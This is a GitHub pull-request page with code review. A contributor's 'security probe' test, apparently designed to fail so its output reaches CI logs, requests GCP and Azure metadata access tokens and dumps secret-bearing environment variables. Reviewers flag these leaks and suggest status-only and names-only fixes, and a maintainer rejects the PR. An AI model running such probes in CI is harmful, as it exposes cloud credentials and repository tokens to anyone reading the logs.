security: add runner escalation probe test #2060
KarimTantawey wants to merge 1 commit into GoogleContainerTools:main from
Thanks for your pull request! It looks like this may be your first contribution to a Google open source project. Before we can look at your pull request, you'll need to sign a Contributor License Agreement (CLA). View this failed invocation of the CLA check for more information. For the most up to date status, view the checks section at the bottom of the pull request.
Code Review
This pull request introduces a security probe test suite designed to audit runner environments for persistence, metadata access, and credential exposure. The suite includes a shell script that probes various endpoints and environment variables, intentionally forcing a failure to ensure log visibility in CI. The review feedback identifies several critical security vulnerabilities where sensitive access tokens from GCP and Azure metadata endpoints, as well as full environment variable values, would be leaked into the build logs. Additionally, it is recommended to tag the Bazel test as 'manual' to prevent the intentional failure from disrupting standard CI pipelines.
| curl -sS -m 2 -H "Metadata-Flavor: Google" \ | ||
| "http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token" || true |
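Review bot: the `|| true` on the last line of this hunk discards curl's exit status, so the probe result can only be read from whatever body or error text curl happened to print. Send the body to /dev/null and log the exit code and HTTP status as explicit fields, so the log answers "was the endpoint reachable" without carrying the response.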
Dumping the response from the GCP token endpoint directly to the logs will expose the access_token in the CI output. Since this test is designed to fail (forcing log visibility), this creates a critical security risk where credentials can be harvested from the build logs.
| curl -sS -m 2 -H "Metadata-Flavor: Google" \ | |
| "http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token" || true | |
| curl -sS -m 2 -o /dev/null -w "%{http_code}\n" -H "Metadata-Flavor: Google" \ | |
| "http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token" || true |
| curl -sS -m 2 -H "Metadata:true" \ | ||
| "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" || true |
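Review bot: the `resource=https://management.azure.com/` parameter in this request asks IMDS for a token for the Azure management API, which is more than a reachability check needs and is exactly what would be written to the log. If the goal is to learn whether the endpoint answers, log only the status code and drop the body.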
Dumping the response from the Azure IMDS token endpoint will expose the access_token in the CI logs. This is a critical security vulnerability as it allows anyone with access to the logs to obtain a valid cloud identity token.
| curl -sS -m 2 -H "Metadata:true" \ | |
| "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" || true | |
| curl -sS -m 2 -o /dev/null -w "%{http_code}\n" -H "Metadata:true" \ | |
| "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" || true |
| echo "FOUND_CRED_PATH: $p" | ||
| fi | ||
| done | ||
| env | grep -E '^(ACTIONS_|GITHUB_|GOOGLE_|GCLOUD_|AWS_|AZURE_|DOCKER_|CRANE_|COSIGN_)' | sort || true |
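Review bot: the `env | grep -E ... | sort` line closing this hunk logs full `NAME=value` pairs, unlike the `FOUND_CRED_PATH` echo above it, which logs only a path. Log variable names only. Because `env` output is line-based, a multi-line value can also produce lines that match the prefix list on their own, so NUL-delimited output (`env -0`) is the safer input for the filter.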
Printing the full values of environment variables with these prefixes is extremely dangerous, as they often contain sensitive secrets like GITHUB_TOKEN, AWS_SECRET_ACCESS_KEY, or ACTIONS_RUNTIME_TOKEN. These values will be visible in the CI logs.
| env | grep -E '^(ACTIONS_|GITHUB_|GOOGLE_|GCLOUD_|AWS_|AZURE_|DOCKER_|CRANE_|COSIGN_)' | sort || true | |
| env | grep -E '^(ACTIONS_|GITHUB_|GOOGLE_|GCLOUD_|AWS_|AZURE_|DOCKER_|CRANE_|COSIGN_)' | cut -d= -f1 | sort || true |
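The names-only listing recommended in the review, as an added example that is not code from the pull request or from the reviewer. It goes one step further than the suggestion and handles multi-line values, where a line-based `cut -d= -f1` can still print part of a value. The function names `line_based_names`, `env_names` and `sample_env` are hypothetical, the sample environment is constructed, and `env -0` assumes GNU coreutils.

```shell
# Added example, not code from the pull request. PREFIXES is copied from the
# probe script; the function names below are hypothetical.
PREFIXES='^(ACTIONS_|GITHUB_|GOOGLE_|GCLOUD_|AWS_|AZURE_|DOCKER_|CRANE_|COSIGN_)'

# Line-based variant: reads plain `env` output on stdin.
# cut passes through any line that has no "=", so a continuation line of a
# multi-line value that happens to match a prefix is printed in full.
line_based_names() {
  grep -E "$PREFIXES" | cut -d= -f1 | sort -u
}

# NUL-safe variant: reads `env -0` output (NUL-terminated records) on stdin.
# Newlines inside values are flattened to spaces, then each NUL becomes the
# record separator, so one variable is always exactly one line.
# cut -s drops any record without "=" instead of echoing it.
env_names() {
  tr '\n\000' ' \n' | grep -E "$PREFIXES" | cut -s -d= -f1 | sort -u
}

# Constructed sample environment: one ordinary secret, and one multi-line
# value whose second line starts with a matching prefix.
sample_env() {
  printf 'AWS_SECRET_ACCESS_KEY=constructed-secret\0'
  printf 'BUILD_NOTE=line one\nGITHUB_TOKEN value constructed-token\0'
  printf 'HOME=/home/runner\0'
}

# Typical use on a runner: env -0 | env_names
```

On the constructed sample, `env_names` prints only `AWS_SECRET_ACCESS_KEY`, while the line-based variant also prints the continuation line containing `constructed-token`.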
Add a PR-executable probe test to collect persistence, metadata, ambient credential, and cache-context evidence from CI runners.
This is not a project for you to spam your security tests